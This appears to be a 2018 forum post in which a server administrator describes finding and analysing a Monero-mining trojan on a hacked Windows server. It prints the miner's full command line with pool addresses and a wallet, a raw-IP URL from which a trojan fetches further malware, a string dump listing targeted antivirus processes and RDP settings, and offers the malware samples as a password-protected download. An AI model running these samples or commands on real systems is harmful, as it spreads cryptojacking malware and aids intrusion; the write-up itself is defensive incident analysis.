Yesterday afternoon, I suddenly found that the website could not be opened, checked the reason, and found that the remote database port could not be opened, so I logged in to the remote database server.
I found that the MySQL service has stopped and found that the CPU is occupying 100%, as shown in the following figure:
In the CPU occupancy sorting, it was found that "win1ogins.exe" consumes the most resources, occupying 73% of the CPU, according to personal experience, this should be mining software, which is to mine XMR Monero!
I also discovered the process of "MyBu.exe" Yiyu, and I thought, when did the server upload the program written in Yiyu? As shown below:
Right-click on "MyBu.exe" to open the file location, folder location: C:\Windows and then sort by time, and find 3 new files, as shown below:
1ndy.exe, MyBu.exe, Mzol.exe documents
Seeing these strange files, I felt that the server should have been hacked, I looked in the Windows logs and found that the login logs had been deleted, and the server was really hacked!
We tried to "win1ogins.exe" right-click on the process and open the file location, but found that it could not be opened!! No reaction! All right! Tools !!
The tool I use is "PCHunter64.exe", just search and download it yourself
The folder where "win1ogins.exe" is located is: C:\Windows\Fonts\system(x64)\ as shown in the figure below:
We can't find this folder in Explorer, as shown below:
The following operation, I copy 3 virus Trojan files to my newly purchased server for operation!!
I copied the virus file to my newly purchased server, and then tried to open MyBu.exe file, and found that MyBu.exe had been self-deleted! And the mining software is released, we know that the explorer cannot open the file path,
We tried to use the powershell tool that comes with the new version of Windows, and found that the mining software exists, and there are 3 folders
(Note that under normal circumstances: C:\Windows\Fonts does not have any folders under it!!!)
I installed the FD packet capture tool on my server, we tried to open the "1ndy.exe" software, found it and tried to access: http://221.229.204.124:9622/9622.exe should be downloading the latest virus Trojan
Now the website is inaccessible.
We tried to open the "Mzol.exe" software and found that the program didn't know what it wanted to do. We open the program with Notepad, as shown below:
LogonServer.exe Game-chess and cards GameServer.exe Baidu kill soft BaiduSdSvc.exe found S-U ServUDaemon.exe in blasting DUB.exe in scanning 1433 1433.exe in catching chickens S.exe Microsoft Antivirus mssecess.exe QUICK HEAL QUHLPSVC.EXE Dr. An V3 V3Svc.exe Dr. Ahn patray.exe Korean Capsule AYAgent.aye Traffic Ore Miner.exe Trend TMBMSRV.exe Ke Niu knsdtray.exe QQ QQ.exe K7 Antivirus K7TSecurity.exe QQ Computer Butler QQPCRTP.exe Kingsoft Guardian ksafe.exe Norton Antivirus rtvscan.exe Avast Network Security ashDisp.exe Avira avcenter.exe Kingsoft kxetray.exe NOD32 egui.exe McCafe Mcshield.exe Rising Antivirus RavMonD.exe Jiangmin Antivirus KvMonXP.exe Kaspersky avp.exe 360 Antivirus 360sd.exe 360 Security Guard 360tray.exe : %s:%d:%s F r i e n d l y N a m e SysFreeString Oleaut32.dll CoCreateInstance CoUninitialize CoInitialize Ole32.dll %d*%sMHz HARDWARE\DEscrip{filtering}tION\System\CentralProcessor\0 ~MHz c:\%s kernel32.dll IsWow64Process No Info Started logging in to SOFTWARE\Microsoft\Windows\CurrentVersion\Run C:\Windows\1ndy.exe Descrip{filter}tion SYSTEM\CurrentControlSet\Services\%s RtlGetNtVersionNumbers ntdll.dll OTHER connections BUSY connections PROXY connections LAN connections MODEM connections NULL CTXOPConntion_Class 3389 PortNumber SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\%s Not discovered Default RDP-Tcp Author: Shi Yonggang, email:pizzq@sina.com
Personally, I guess that "Mzol.exe" and "1ndy.exe" are actually the same thing, just the difference between the new version and the old version!
Let win1ogins.exe's take a look at the startup parameters of the software, as shown below:
C:\Windows\Fonts\system(x64)\win1ogins.exe -a cryptonight -o stratum+tcp://pool.supportxmr.com:5555 -u 49YwvcQRrVvYXR2H9Ww5u1FaB3AhGVCuo8iWnc99BVPv5Su2epJ3mYfN3voS6h3Kurd8V5rGPSooyd7LdWYLXXwjSjdZb9y -p MyBlue -o stratum+tcp://pool.minexmr.com:443 -u 49YwvcQRrVvYXR2H9Ww5u1FaB3AhGVCuo8iWnc99BVPv5Su2epJ3mYfN3voS6h3Kurd8V5rGPSooyd7LdWYLXXwjSjdZb9y -p x -k --donate-level=1
If we really mine XMR Monero, we open the mining pool address: https://supportxmr.com/ Query the address of the wallet, as shown in the figure below:
We calculate the income according to the computing power, dig 0.42 coins a day, and calculate more than 1,000 according to the current market, the daily income is probably more than 500 yuan!
Of course, Monero has also risen to more than 2,000 yuan!
As for how to remove the "win1ogins.exe" mining virus, the PCHunter64 program can remove the mining virus manually! Simply ending the process doesn't work, I've manually cleaned the virus on my server.
Of course, it's better to leave it to others to do to remove the virus, after all, I am not a professional in doing this!
Finally, attach 3 virus files and unzip the password A123456
1ndy.zip
(1.29 MB, Number of downloads: 12, 售价: 1 粒MB)
(End)
|
Posted on 4/4/2018 12:37:15 PM
|
|
|
|
